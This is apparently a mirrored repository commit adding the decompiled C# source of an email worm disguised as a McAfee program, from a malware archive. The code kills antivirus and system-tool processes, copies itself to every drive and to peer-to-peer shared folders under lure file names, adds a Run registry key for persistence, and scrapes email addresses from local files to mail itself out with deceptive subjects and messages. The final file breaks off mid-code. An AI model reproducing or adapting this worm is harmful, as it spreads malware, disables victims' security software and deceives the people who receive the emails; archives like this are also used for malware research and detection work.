daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Api/api.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Api.api
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.Runtime.InteropServices;
namespace Api
{
public class api
{
public const int SW_HIDE = 0;
public const int ConsoleWindowClass = 1;
public const string amir = "hi i'm devil worm";
public const int EWX_LOGOFF = 0;
public const int EWX_SHUTDOWN = 1;
public const int EWX_REBOOT = 2;
public const int EWX_FORCE = 4;
public const int EWX_POWEROFF = 8;
[DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
public static extern int mciSendString(
string lpstrCommand,
string lpstrReturnString,
int uReturnLength,
int hwndCallback);
[DllImport("user32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
[DllImport("user32")]
public static extern int MessageBeep(int wType);
[DllImport("kernel32")]
public static extern int Sleep(int dwMilliseconds);
[DllImport("user32", EntryPoint = "FindWindowA")]
public static extern int FindWindow(string lpClassName, string lpWindowName);
[DllImport("shell32", EntryPoint = "#59")]
public static extern int SHRestartSystemMB(int hOwner, string sExtraPrompt, int uFlags);
}
}
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("60fd839e-9d72-4f28-91ea-e8e543d11475")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © civil 2006")]
[assembly: AssemblyProduct("Mcafee")]
[assembly: AssemblyCompany("civil")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Mcafee")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Email-Worm.MSIL.Cabac.a.csproj
+53
View File
@@ -0,0 +1,53 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Mcafee</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Mcafee</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Form2.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Api\api.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Form2.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Email-Worm.MSIL.Cabac.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Mcafee", "Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.csproj", "{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Form1.cs
+218
View File
@@ -0,0 +1,218 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Form1
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using Api;
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace Mcafee
{
public class Form1 : Form
{
private IContainer components;
private Timer mailer;
private Timer killer;
private Timer coppy;
private Timer eerrorr;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.mailer = new Timer(this.components);
this.killer = new Timer(this.components);
this.coppy = new Timer(this.components);
this.eerrorr = new Timer(this.components);
this.SuspendLayout();
this.mailer.Enabled = true;
this.mailer.Interval = 50000;
this.mailer.Tick += new EventHandler(this.mailer_Tick);
this.killer.Enabled = true;
this.killer.Interval = 150;
this.killer.Tick += new EventHandler(this.killer_Tick);
this.coppy.Enabled = true;
this.coppy.Interval = 720000;
this.coppy.Tick += new EventHandler(this.coppy_Tick);
this.eerrorr.Enabled = true;
this.eerrorr.Interval = 90000;
this.eerrorr.Tick += new EventHandler(this.eerrorr_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = "AmirCivil";
this.Activated += new EventHandler(this.amir22);
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
public Form1() => this.InitializeComponent();
private void Form1_Load(object sender, EventArgs e)
{
}
private void mailer_Tick(object sender, EventArgs e) => new Form2().Show();
private void killer_Tick(object sender, EventArgs e)
{
try
{
string[] strArray = new string[57]
{
"NPROTECTED",
"GhostTray",
"NAVW32",
"F-AGNT95",
"NOD32",
"NETD32",
"NETMON",
"IOMON98",
"SCAN32",
"NORMIST",
"NAVW3",
"ADAWARE",
"AGENTW",
"LU32",
"NAVAP32",
"ANTIVIR",
"TCM",
"W9X",
"AVKSERV",
"AV32",
"ACKWIN32",
"AD-AWARE",
"ADVXDWIN",
"AGENTSVR",
"AGENTW",
"ANTIVIRUS",
"ANTS",
"APIMONITOR",
"APLICA32",
"ARR",
"AUPDATE",
"AUTODOWN",
"AUTOTRACE",
"AVE32",
"AVGCC32",
"AVGCTRL",
"AVGNT",
"CFINET",
"CLEANPC",
"CTRL",
"AV32",
"DATEMANAGER ",
"DOORS",
"DPFSETUP ",
"FCH32 ",
"FNRB32",
"notepad",
"Babylon",
"POP3TRAP",
"WINWORD",
"realplay",
"EXCEL",
"taskmgr",
"regedit",
"vb6",
"ZONEALARM",
"POWERPNT"
};
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 57)]))
process.CloseMainWindow();
}
catch (Exception ex)
{
}
}
private void coppy_Tick(object sender, EventArgs e)
{
try
{
string str = new string[10]
{
"\\Services.pif",
"\\winamp.exe",
"\\mail.dll.exe",
"\\vista.exe",
"\\Norton.exe",
"\\Mcafee.exe",
"\\Nod32.cmd",
"\\avg.pif",
"\\AmirCivil.pif",
"\\ScreenSaver.scr"
}[new Random().Next(0, 10)];
foreach (string logicalDrive in Directory.GetLogicalDrives())
File.Copy(Application.ExecutablePath, logicalDrive + str);
}
catch (Exception ex)
{
}
}
private void amir22(object sender, EventArgs e)
{
this.Hide();
try
{
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\WinServicces.cab.bak.exe");
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet3", (object) (Environment.SystemDirectory + "\\WinServicces.cab.bak.exe"), RegistryValueKind.ExpandString);
Registry.SetValue("HKEY_CURRENT_USER\\SadNet3", "SadNet3", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
}
catch (Exception ex)
{
}
try
{
File.Copy(Application.ExecutablePath, "C:\\Program Files\\\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\\\Kazaa\\My Shared Folder\\fun.pic.scr");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
}
catch (Exception ex)
{
}
}
private void eerrorr_Tick(object sender, EventArgs e)
{
api.MessageBeep(20);
api.SHRestartSystemMB(0, "Windows", 1);
}
}
}
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Form2.cs
+198
View File
@@ -0,0 +1,198 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Form2
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Mail;
using System.Windows.Forms;
namespace Mcafee
{
public class Form2 : Form
{
private IContainer components;
public Form2() => this.InitializeComponent();
private void Form2_Load(object sender, EventArgs e)
{
}
private void amir(object sender, EventArgs e)
{
this.Hide();
try
{
for (int index = 0; index < 6; ++index)
{
string str1 = new string[20]
{
"mcafee",
"symantec",
"Yahoo!",
"Norton! ",
"Text message",
"NOD32",
"Important bill! ",
"Message Notify ",
"Fax Message",
"Protected message",
"Cum a murit Papa?",
"Encrypted document",
"Account notify",
"E-mail account disabling warning",
"E-mail technical support message.",
"E-mail warning",
"Email account utilization warning.",
"Fax Message Received ",
"Pentru Ionel",
"IranSare2008"
}[new Random().Next(0, 20)];
string str2 = new string[5]
{
"AmirCivil.pic.cmd",
"register.pif ",
"sexy-screensaver.scr ",
"fullmessenger.exe",
"readme.html.cmd"
}[new Random().Next(0, 5)];
string str3 = new string[20]
{
"nice stuffs i got here... ",
"Message Error",
"i've got cool stuffs here... ",
"i want you to know how much i care for you... ",
"hello! i'm your long, lost friend... ",
"kindness is a virtue... ",
"sharing files is the essence of living... check this out... ",
"hi, friend... here are some nice stuffs that i got from the internet... check it out... ",
"hmmmn... i guess you've forgotten me... but anyways, i wanna make up... here are the files that made me like the internet more... see for yourself...",
"one of the files is a virus... can you tell me which one is it? hehehe, i'm only joking... your friend, paul.. ",
"classroom test of you? ",
"old photos about you? ",
"i hope thats not true! ",
"three files for you to keep... always remember that i'm into deep... i don't know you but i think i'm in love... ",
" you know amir_civil?!",
"Ioana, sex in grup in camin. Cred ca o stii si ",
"another pic, have fun! ... :->",
"Credeti ca ar fi mai bine ca Romania sa-si retraga trupele din Irak anul acesta?Deschideti programul Vot, alegeti votul dvs. si vedeti rezultatele.Parerea dvs. conteaza!",
"the information is wrong! ",
"Credeti ca ar fi mai bine ca Romania sa-si retraga trupele din Irak anul acesta?Deschideti programul Vot, alegeti votul dvs. si vedeti rezultatele.Parerea dvs. conteaza! "
}[new Random().Next(0, 20)];
string searchPattern = new string[3]
{
"*txt",
"*html",
"*xml"
}[new Random().Next(0, 3)];
string str4 = new string[20]
{
"mcafee@yahoo.com",
"symantec@yahoo.com",
"nod32@yahoo.com",
"panda@yahoo.com",
"avg@yahoo.com",
"password@yahoo.com",
"info@yahoo.com",
"ebook@yahoo.com",
"LongShot@yahoo.com",
"pic@yahoo.com",
"update@yahoo.com",
"matt@yahoo.com",
"steve@yahoo.com",
"smith@yahoo.com",
"stan@yahoo.com",
"bill@yahoo.com",
"bob@yahoo.com",
"YourFriend@yahoo.com",
" mail@yahoo.com",
"ted@yahoo.com"
}[new Random().Next(0, 20)];
string path = new string[5]
{
"C:\\",
"D:\\",
"E:\\",
"G:\\",
"F:\\"
}[new Random().Next(0, 5)];
try
{
string[] strArray = new string[1]
{
"C:\\windows"
};
foreach (string str5 in strArray)
{
foreach (string file in Directory.GetFiles(path, searchPattern))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
{
string str6 = match.ToString();
try
{
MailMessage message = new MailMessage();
message.From = str4;
message.To = str6;
message.Cc = "info@yahoo.com";
message.Bcc = "password@yahoo.com";
message.Subject = str1;
message.Body = str3;
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
SmtpMail.Send(message);
}
catch (Exception ex)
{
}
}
}
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
private void timer1_Tick(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form2);
this.Text = nameof (Form2);
this.Activated += new EventHandler(this.amir);
this.Load += new EventHandler(this.Form2_Load);
this.ResumeLayout(false);
}
}
}
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Form2.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Program.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Program
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System;
using System.Windows.Forms;
namespace Mcafee
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}
MSIL/Email-Worm/MSIL/C/Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Properties.Resources
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Mcafee.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Mcafee.Properties.Resources.resourceMan == null)
